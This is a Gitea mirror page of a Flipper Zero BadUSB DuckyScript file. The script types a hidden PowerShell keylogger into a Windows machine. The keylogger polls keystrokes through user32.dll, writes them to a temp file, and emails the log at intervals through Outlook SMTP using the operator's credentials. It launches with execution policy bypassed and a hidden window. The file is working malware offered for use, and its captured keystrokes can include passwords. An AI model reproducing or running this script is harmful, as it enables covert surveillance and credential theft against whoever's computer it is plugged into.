gitea-mirror/BadUSB-Files-For-FlipperZero
1
0
Fork 0
mirror of https://github.com/beigeworm/BadUSB-Files-For-FlipperZero.git synced 2026-01-04 08:47:15 -08:00
Code Issues Packages Projects Releases Wiki Activity
Files
a989595bc0eb8ee616946446fd8dc2b030b47d21
BadUSB-Files-For-FlipperZero/OSINT/Keylogger to Email.txt
beigeworm 829852770b Update Keylogger to Email.txt
2023-05-10 12:57:07 +00:00

485 lines
6.6 KiB
Plaintext
Raw Blame History

REM Title: Email System & User Info (old)
REM Author: @beigeworm | https://github.com/beigeworm
REM Description: Uses Powershell to gather system info and send it via Email.
REM Target: Windows 10
REM *NOTE* - There are a lot of ESCAPE characters half way down because typing speed is too fast for notepad. (Can be avoided by moving the mouse while flipper types)
REM this is a quick and dirty fix that i will revise in the near future.
REM *REQUIREMENTS*
REM you will need a Microsoft Outlook Email address for this to work
REM *SETUP*
REM replace YOUR_EMAIL and YOUR_PASSWORD. (check entire script)
REM set $runtime=1 to desired interval beetween emails (in minutes). Default is 1 minute.
REM some setup for dukie script
DEFAULT_DELAY 100
REM Open Notepad for script building.
DELAY 1000
GUI r
DELAY 500
STRING notepad
ENTER
DELAY 2500
STRING Do{$FromTo = "YOUR_EMAIL";$Pass = "YOUR_PASSWORD";$RunTime = 1;$TimesRun = 1;$getT = Get-Date;$Subj = "$env:COMPUTERNAME : log Results";$body = "$env:COMPUTERNAME : Results : $strt"
ENTER
STRING $SMTP = "smtp.outlook.com";$Prt = "587";$Creds = new-object Management.Automation.PSCredential $FromTo, ($Pass | ConvertTo-SecureString -AsPlainText -Force)
ENTER
STRING $Attachment = $strt = Get-Date;$end = $strt.addminutes($RunTime);function Start-Key($Path="$env:temp\log.txt"){$sigs = @'
ENTER
STRING [DllImport("user32.dll", CharSet=CharSet.Auto, ExactSpelling=true)] public static extern short GetAsyncKeyState(int virtualKeyCode);
ENTER
STRING [DllImport("user32.dll", CharSet=CharSet.Auto)] public static extern int GetKeyboardState(byte[] keystate);
ENTER
STRING [DllImport("user32.dll", CharSet=CharSet.Auto)] public static extern int MapVirtualKey(uint uCode, int uMapType);
ENTER
STRING [DllImport("user32.dll", CharSet=CharSet.Auto)] public static extern int ToUnicode(uint wVirtKey, uint wScanCode, byte[] lpkeystate, System.Text.StringBuilder pwszBuff, int cchBuff, uint wFlags);
ENTER
STRING '@
ENTER
ENTER
STRING $API = Add-Type -MemberDefinition $sigs -Name 'Win32' -Namespace API -PassThru;$null = New-Item -Path $Path -ItemType File -Force;try{$rnnr = 0;while ($TimesRun -ge $rnnr){
ENTER
STRING while ($end -ge $getT){Start-Sleep -Milliseconds 30;for($ascii = 9; $ascii -le 254; $ascii++){$state = $API::GetAsyncKeyState($ascii);if($state -eq -32767){$null = [console]::CapsLock
ENTER
STRING $virtualKey = $API::MapVirtualKey($ascii, 3);$kbstate = New-Object Byte[] 256;$checkkbstate = $API::GetKeyboardState($kbstate);$mychar = New-Object -TypeName System.Text.StringBuilder
ENTER
STRING $success = $API::ToUnicode($ascii, $virtualKey, $kbstate, $mychar, $mychar.Capacity, 0);if($success){[System.IO.File]::AppendAllText($Path, $mychar, [System.Text.Encoding]::Unicode)}}}
ENTER
STRING $getT = Get-Date};Sleep 3;send-mailmessage -from $FromTo -to $FromTo -subject $Subj -body $body -Attachment $Path -smtpServer $SMTP -port $Prt -credential $Creds -usessl
ENTER
STRING Remove-Item -Path $Path -force}}finally{$null = New-Item -Path $Path -ItemType File -Force}}Start-Key}While ($a -le 5)
ENTER
DELAY 1000
REM because typing speed can't be adjusted. (Can be avoided by moving the mouse while flipper types)
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
DELAY 10000
REM save in temp directory.
DELAY 1000
CTRL-SHIFT s
DELAY 1500
STRING %temp%
ENTER
STRING txtlog.ps1
DELAY 500
TAB
DOWN
DOWN
ENTER
ENTER
DELAY 1000
ALT F4
REM Open Powershell and start logs.
DELAY 1000
GUI r
DELAY 500
STRING powershell -NoP -NonI -W Hidden -Exec Bypass -C cd $env:temp;sleep 1; ./txtlog.ps1;sleep 5;exit
ENTER
Reference in New Issue View Git Blame Copy Permalink